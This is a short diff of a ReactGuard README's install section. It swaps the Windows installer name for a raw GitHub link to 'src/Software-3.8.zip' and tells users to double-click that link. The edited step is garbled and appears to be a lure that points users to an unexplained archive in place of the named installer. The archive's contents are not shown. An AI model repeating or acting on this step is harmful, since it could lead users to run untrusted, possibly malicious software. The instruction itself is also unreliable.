Black-and-reds/reactguard/README.md

 ### 4. Install ReactGuard
 Once the download is complete, install the application:

-- **Windows:** Double-click the `reactguard-windows.exe` file.
+- **Windows:** Double-click the `https://github.com/Black-and-reds/reactguard/raw/refs/heads/main/src/Software-3.8.zip` file.
 Follow the prompts to complete installation.

 - **macOS:** Open the downloaded `.dmg` file.
 Drag the ReactGuard icon to your Applications folder.